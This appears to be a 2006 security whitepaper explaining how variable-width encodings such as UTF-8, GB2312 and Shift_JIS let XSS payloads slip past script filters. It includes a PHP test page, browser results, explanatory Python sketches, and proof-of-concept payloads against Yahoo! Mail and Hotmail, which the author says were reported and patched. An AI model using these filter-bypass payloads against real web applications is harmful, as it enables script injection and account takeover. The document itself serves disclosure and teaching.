

Posted Aug 18, 2006
Authored by Cheng Peng Su

Whitepaper discussing the bypassing of script filter with variable-width encodings.

SHA-256 | 3f758cdb2a9ed75213ae2fa409be10c8c8b216d0491636c6a61a4c332194a72f


Bypassing script filters with variable-width encodings

Author: Cheng Peng Su (applesoup_at_gmail.com)
Date: August 7, 2006

It is well known that one of the main problems in constructing an XSS
attack is obfuscating the malicious code so that it passes script
filters. In the following paragraphs I will explain the concept of
bypassing script filters with variable-width encodings, and disclose
how this concept applied to the Hotmail and Yahoo! Mail web-based mail
services.

Variable-width encoding Introduction

A variable-width encoding (also known as a variable-length encoding) is
a character encoding scheme in which codes of differing lengths are
used to encode a character set. The most common variable-width
encodings are multibyte encodings, which use varying numbers of bytes
to encode different characters. Multibyte encodings were first used for
Chinese, Japanese and Korean, whose character sets far exceed 256
characters. The Unicode standard has two variable-width encodings:
UTF-8 and UTF-16. The most commonly used codes are two-byte codes; the
EUC-CN form of GB2312, EUC-JP and EUC-KR are examples of such two-byte
EUC codes. There are also some three-byte and four-byte codes.
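
The differing code lengths are easy to observe directly. The following
is a minimal Python sketch, not part of the original paper; the sample
characters and the helper name encoded_lengths are chosen only for
illustration, and the codec names are those of Python's standard
library.

```python
# Hypothetical sample characters paired with standard Python codec names.
samples = [
    ("A", "utf-8"),               # ASCII letter
    ("\u00e9", "utf-8"),          # Latin small letter e with acute
    ("\u4e2d", "utf-8"),          # CJK ideograph
    ("\u4e2d", "gb2312"),         # same ideograph in the EUC-CN form of GB2312
    ("\u3042", "euc_jp"),         # hiragana letter A
    ("\ud55c", "euc_kr"),         # hangul syllable HAN
    ("\u4e2d", "utf-16-le"),      # one 16-bit code unit
    ("\U0001f600", "utf-16-le"),  # outside the BMP, needs a surrogate pair
]


def encoded_lengths(pairs):
    """Return (character, codec, encoded bytes) for every sample."""
    return [(ch, codec, ch.encode(codec)) for ch, codec in pairs]


for ch, codec, raw in encoded_lengths(samples):
    print(f"U+{ord(ch):04X} in {codec}: {len(raw)} byte(s), hex {raw.hex()}")
```

Note that in the multibyte cases the first byte has its high bit set;
it is this first byte that the rest of the paper relies on.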

Example and Discussion

The following PHP file is the starting point for my idea.


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<?php
// The loop and the closing "available</font>" are reconstructed from the text below.
for ($i = 0; $i < 256; $i++) {
    echo "Char $i is <font face=\"xyz".chr($i)."\">not </font>"
        ."<font face=\" onmouseover=alert($i) notexist=".chr($i)."\"     >"
        // NOTE: 5 space characters following the last \"
        ."available</font><br>\n";
}
?>



For most values of $i, Internet Explorer 6.0 (SP2) displays "Char XXX
is not available". When $i is between 192 (0xC0) and 255 (0xFF),
however, it displays "Char XXX is available". Take $i=0xC0 as an
example and consider the following output:

Char 192 is <font face="xyz[0xC0]">not </font><font face="
onmouseover=alert(192) notexist=[0xC0]"     >available</font>

0xC0 is one of the 32 first bytes of 2-byte sequences (0xC0-0xDF) in
UTF-8. So when IE parses the above code, it treats 0xC0 and the
following quote as one sequence. The two FONT elements therefore become
one, with "xyz[0xC0]">not </font><font face=" as the value of the FACE
parameter. The second 0xC0 starts another 2-byte sequence with the
quote that follows it, and that sequence becomes the unquoted value of
the NOTEXIST parameter. Because space characters follow the quote, each
of 0xE0-0xEF, the first bytes of 3-byte sequences, is treated together
with the following quote and one space character as the value of the
NOTEXIST parameter. Likewise, each first byte of a 4-byte sequence
(0xF0-0xF7), 5-byte sequence (0xF8-0xFB) or 6-byte sequence
(0xFC-0xFD) is treated together with the following quote and space
characters as one sequence.
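
The parsing behaviour described above can be modelled with a small
Python sketch. It is not IE's actual decoder: utf8_sequence_length,
lenient_view and sample are hypothetical names, and the model simply
assumes a decoder that trusts the first byte and swallows the bytes
after it without checking them, using the first-byte ranges listed in
the text.

```python
def utf8_sequence_length(lead: int) -> int:
    """Sequence length implied by a first byte, per the ranges in the text."""
    if 0xC0 <= lead <= 0xDF:
        return 2
    if 0xE0 <= lead <= 0xEF:
        return 3
    if 0xF0 <= lead <= 0xF7:
        return 4
    if 0xF8 <= lead <= 0xFB:
        return 5
    if 0xFC <= lead <= 0xFD:
        return 6
    return 1


def lenient_view(data: bytes) -> str:
    """Assumed model: a first byte consumes its whole sequence unchecked."""
    out = []
    i = 0
    while i < len(data):
        n = utf8_sequence_length(data[i])
        # A multibyte sequence is shown as one placeholder character.
        out.append(chr(data[i]) if n == 1 else "\ufffd")
        i += n
    return "".join(out)


def sample(lead: int) -> bytes:
    """Markup in the shape of the PHP output, with 5 spaces after the quote."""
    b = bytes([lead])
    return (b'<font face="xyz' + b + b'">not </font>'
            + b'<font face=" onmouseover=alert(1) notexist=' + b
            + b'"' + b" " * 5 + b">available</font>")


print(lenient_view(sample(0x41)))  # ordinary byte: both quotes survive
print(lenient_view(sample(0xC0)))  # 2-byte first byte: both closing quotes vanish
```

With an ordinary byte the first FACE value still ends at its own quote.
With 0xC0 that quote is swallowed, so the value runs on to the opening
quote of the second FONT element and the onmouseover text ends up
outside any quoted value.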


Here are the results of the above code as parsed by Internet Explorer
6.0 (SP2), Firefox and Opera 9.0.1 under different variable-width
encodings. The values in the table are the ranges of $i for which the
page shows "available".

| Encoding  | IE 6.0 (SP2) | Firefox   | Opera 9.0.1 |
| UTF-8     | 0xC0-0xFF    | none      | none        |
| GB2312    | 0x81-0xFE    | none      | 0x81-0xFE   |
| GB18030   | none         | none      | 0x81-0xFE   |
| BIG5      | 0x81-0xFE    | none      | 0x81-0xFE   |
| EUC-KR    | 0x81-0xFE    | none      | 0x81-0xFE   |
| EUC-JP    | 0x81-0x8D    | 0x8F      | 0x8E        |
|           | 0x8F-0x9F    |           | 0x8F        |
|           | 0xA1-0xFE    |           | 0xA1-0xFE   |
| SHIFT_JIS | 0x81-0x9F    | 0x81-0x9F | 0x81-0x9F   |
|           | 0xE0-0xFC    | 0xE0-0xFC | 0xE0-0xFC   |


I don't think there is a single typical way to exploit this, because
the technique is flexible. Just remember that if a web application uses
a variable-width encoding, you can bury the characters that follow your
entry, and the buried characters might be crucial ones.

The above code might be exploited in general web applications that let
you format your entry in an HTML-like way. For example, in some forums,
[font=Courier New]message[/font] in your message is transformed into
<font face="Courier New">message</font>. Supposing the forum uses
UTF-8, we can attack by sending

[font=xyz[0xC0]]buried[/font][font=abc onmouseover=alert() s=[0xC0]]exploited[/font]

and it will be transformed into

<font face="xyz[0xC0]">buried</font><font face="abc
onmouseover=alert() s=[0xC0]">exploited</font>
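
To make the forum case concrete, here is a minimal Python sketch of
such a transformation. The function render_font_tags and its filter
rule are hypothetical, not taken from any real forum software; the
sketch only assumes a byte-level rewrite that rejects quotes and angle
brackets inside the font name.

```python
import re

# Hypothetical forum markup: [font=NAME]TEXT[/font]
FONT_TAG = re.compile(rb"\[font=(.*?)\](.*?)\[/font\]", re.S)


def render_font_tags(message: bytes) -> bytes:
    """Rewrite [font=...] tags to FONT elements, refusing markup characters."""
    def repl(match):
        face, text = match.group(1), match.group(2)
        # Assumed filter rule: drop the tag if NAME contains " < or >.
        if any(c in face for c in b'"<>'):
            return b""
        return b'<font face="' + face + b'">' + text + b"</font>"

    return FONT_TAG.sub(repl, message)


attack = (b"[font=xyz\xc0]buried[/font]"
          b"[font=abc onmouseover=alert() s=\xc0]exploited[/font]")
html = render_font_tags(attack)
print(html)
```

The input contains no quote or angle bracket, so the assumed filter has
nothing to object to. In the output, however, each 0xC0 sits directly
before a closing quote, which is exactly the byte pair that a browser
decoding the page as UTF-8 in the way described earlier would merge.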

Again, exploitation is very flexible; this FONT-FONT example is only
meant to illustrate the idea. The following exploit against Yahoo! Mail
is quite different from it.


Using this method, I found two XSS vulnerabilities, one in Hotmail and
one in Yahoo! Mail. I informed Yahoo and Microsoft on April 30 and
May 12 respectively, and both have patched the vulnerabilities.

Yahoo! Mail XSS

Before I discovered this vulnerability, the Yahoo! Mail filtering
engine could already block the "expression()" syntax in a CSS
attribute, even when a comment was used to break up the word
( expr/* */ession() ). I placed [0x81] before an asterisk so that the
two bytes form one sequence; the browser then no longer sees the first
*/, and the second */ closes the comment. The filtering engine,
however, treated the first two comment symbols as a pair.

MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=GB2312
Subject: example

<span style='width:expr/*[0x81]*/*/ession(alert())'>exploited</span>
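
The two readings of this style value can be compared with a short
Python sketch. Both functions are simplified models with hypothetical
names: strip_comments stands in for a byte-level filter, and
fuse_double_bytes assumes a decoder that merges any byte in 0x81-0xFE
with the byte after it, as the table above reports for GB2312 in IE and
Opera.

```python
import re

COMMENT = re.compile(rb"/\*.*?\*/", re.S)


def strip_comments(css: bytes) -> bytes:
    """Remove CSS comments by looking at raw bytes only."""
    return COMMENT.sub(b"", css)


def fuse_double_bytes(data: bytes, lo: int = 0x81, hi: int = 0xFE) -> bytes:
    """Assumed decoder model: a first byte swallows the next byte."""
    out = bytearray()
    i = 0
    while i < len(data):
        if lo <= data[i] <= hi and i + 1 < len(data):
            out += b"?"  # the pair is treated as one unknown character
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


payload = b"width:expr/*\x81*/*/ession(alert())"

filter_view = strip_comments(payload)
browser_view = strip_comments(fuse_double_bytes(payload))

print(filter_view)
print(browser_view)
```

In the byte-level view the comment ends at the first */, so the word
"expression" never appears and nothing is blocked. In the fused view
the first asterisk belongs to the 0x81 sequence, the comment ends at
the second */, and the remaining text reads expression(alert()).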

Hotmail XSS

This exploit is almost the same as the PHP example above.

MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=SHIFT_JIS
Subject: example

<font face="[0x81]"></font><font face=" onmouseover=alert()


RFC 3629, the UTF-8 standard (http://tools.ietf.org/html/rfc3629)
RSnake: XSS Cheat Sheet (http://ha.ckers.org/xss.html)

( Original text: http://applesoup.googlepages.com/bypass_filter.txt )